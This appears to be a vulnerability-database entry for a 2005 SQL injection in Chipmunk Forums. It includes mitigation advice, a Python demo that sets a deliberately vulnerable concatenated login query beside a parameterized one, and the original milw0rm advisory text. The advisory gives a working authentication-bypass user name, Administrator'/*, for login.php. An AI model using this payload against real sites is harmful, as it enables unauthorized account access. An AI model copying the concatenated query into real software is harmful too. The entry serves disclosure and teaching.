Vendor: Chipmunk Forums
By: milw0rm.com
CVSS: 7.5 (HIGH)
Vulnerability class: SQL injection
CWE: 89
Product Name: Chipmunk Forums
Patch Exists: NO
2005

Chipmunk Forums SQL Injection Vulnerability

The vulnerability allows an attacker to execute arbitrary SQL queries by injecting SQL into the login.php script. Entering the user name Administrator'/* (the single quote closes the string literal and /* opens a comment that discards the rest of the query) lets the attacker bypass authentication and gain unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest patches and security updates is important.
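
The following added example (not code from Chipmunk Forums or the advisory) contrasts a string-concatenated login query with a parameterized one, using Python and an in-memory SQLite database. The table layout, the query shape and all function names are assumptions, since the page does not show the source of login.php.

```python
import hashlib
import hmac
import sqlite3

def pw_hash(password):
    # Fixed salt keeps the demo short; use a per-user random salt in practice.
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               b"demo-salt", 100_000).hex()

def make_db():
    # Constructed schema and data; the forum's real tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("Administrator", pw_hash("correct horse")))
    return db

def login_concatenated(db, name, password):
    """Assumed vulnerable pattern: user input spliced into the SQL text."""
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND pw_hash = '" + pw_hash(password) + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, name, password):
    """Input is bound as data, so a quote or /* cannot alter the statement."""
    row = db.execute("SELECT pw_hash FROM users WHERE name = ?",
                     (name,)).fetchone()
    # Compare in application code, in constant time, against the stored hash.
    return row is not None and hmac.compare_digest(row[0], pw_hash(password))

if __name__ == "__main__":
    db = make_db()
    probe = "Administrator'/*"  # the user name quoted in the advisory
    for fn in (login_concatenated, login_parameterized):
        print(fn.__name__,
              "| wrong password:", fn(db, "Administrator", "guess"),
              "| advisory input:", fn(db, probe, "guess"))
```

With the concatenated query the advisory's user name is accepted without the password; with the bound parameter it is looked up as a literal name that does not exist, and the login is refused.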

Exploit-DB raw data:

/*==========================================*/
// GHC -> Chipmunk forum <- ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: high
/*==========================================*/

[exploit]
at login.php enter user name as
Administrator'/*

# milw0rm.com [2005-02-10]